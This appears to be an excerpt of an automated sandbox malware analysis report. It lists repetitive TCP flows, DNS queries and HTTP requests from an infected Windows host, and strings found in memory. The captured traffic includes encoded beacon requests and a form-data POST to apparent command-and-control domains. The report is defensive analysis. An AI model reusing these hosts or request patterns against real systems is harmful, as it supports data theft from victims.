              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163

              Networking

              Source: C:\Windows\System32\rundll32.exeDomain query: www.diced.jp
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 153.121.40.91 443
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeDNS query: www.swiftbyrte.xyz
              Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
              Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
              Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
              Source: Joe Sandbox ViewASN Name: SAKURA-BSAKURAInternetIncJP SAKURA-BSAKURAInternetIncJP
              Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AC6CA823-E116-4D41-887B-65794B94B181}.tmp
              Source: global trafficHTTP traffic detected: GET /~lizard581/cgi-bin/imageup/data/1424.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: www.diced.jp
              Source: global trafficHTTP traffic detected: GET /5lk2/?2Z94P=LzK44tdp_JPt28wP&S6g0i61=xN5yXASnf8rfOFDMZPS3Aw0q6F9xWSQOcuF1ZBKgOvcqlR+sQpCJKI8dzMuE4/uzfZcBpIlRLxNBArokm5VkqsBLYuSwN+GZ1JVyf5BEJyjaCGsWVIC6Oje00DIX HTTP/1.1Host: www.d63dm.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /2018/sqlite-dll-win32-x86-3250000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /bbvc/?S6g0i61=AQnEtdfnecn/cJt9i/023LRQegDiN6HYsPciUFTRW5IBsDtKgzQsjW78chH883+eUHibxbeZVIJMdiRQvr4KlK/99b81DewKuJLGdX/rY9gS0DqA57O/0mcrhkmt&2Z94P=LzK44tdp_JPt28wP HTTP/1.1Host: www.danceonwater.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /1pj2/?S6g0i61=Q9HAAZkCTqKabe7K9gqmXFE+SKHCRVqPW1vmcslVAAVFIE4vmP8qeBByw9bQm+sf9dgpGu9sujYQB/6wq00OHtIuIS6zL5jH+2jz6veFJLP5dS32kbHd1AuYwep/&2Z94P=LzK44tdp_JPt28wP HTTP/1.1Host: www.foshape.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /4nss/?S6g0i61=6+WoHn2deLk8NJlLXYXNnS+xy6y4IG2yMX4VldfHBIoEopHs/Hw0Y5um7kzlNPuKTbh4gzzb5ORm5rQz5MS/zlApmrlBhjwV83cLky4dFg4gLxZewVN2CP71ee4I&2Z94P=LzK44tdp_JPt28wP HTTP/1.1Host: www.swiftbyrte.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.diced.jp
              Source: global trafficDNS traffic detected: DNS query: www.d63dm.top
              Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
              Source: global trafficDNS traffic detected: DNS query: www.danceonwater.net
              Source: global trafficDNS traffic detected: DNS query: www.foshape.top
              Source: global trafficDNS traffic detected: DNS query: www.swiftbyrte.xyz
              Source: global trafficDNS traffic detected: DNS query: www.maryneedskidneys.info
              Source: unknownHTTP traffic detected: POST /bbvc/ HTTP/1.1Host: www.danceonwater.netAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.danceonwater.netReferer: http://www.danceonwater.net/bbvc/Content-Length: 2164Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 09:04:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://aia.entrust.net/ovcs1-chain256.cer01
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl.entrust.net/g2ca.crl0;
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl.entrust.net/ovcs1.crl0J
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.entrust.net00
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.entrust.net05
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.danceonwater.net/px.js?ch=1
              Source: convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.danceonwater.net/px.js?ch=2
              Source: convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.danceonwater.net/sk-logabpstatus.php?a=RXBFWi9PS1JhK2o0VE4rSFJRc2lNUXNGcGpJQlFMaUNXZ29mRW
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://www.entrust.net/rpa0
              Source: mVjlVtpvDsvJ.exe, 0000000C.00000002.648430732.0000000000950000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.maryneedskidneys.info
              Source: mVjlVtpvDsvJ.exe, 0000000C.00000002.648430732.0000000000950000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.maryneedskidneys.info/tqdg/
              Source: convert.exe, 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drString found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002F88000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.00000000039A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://bf102.slafwi.cn/38.html
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
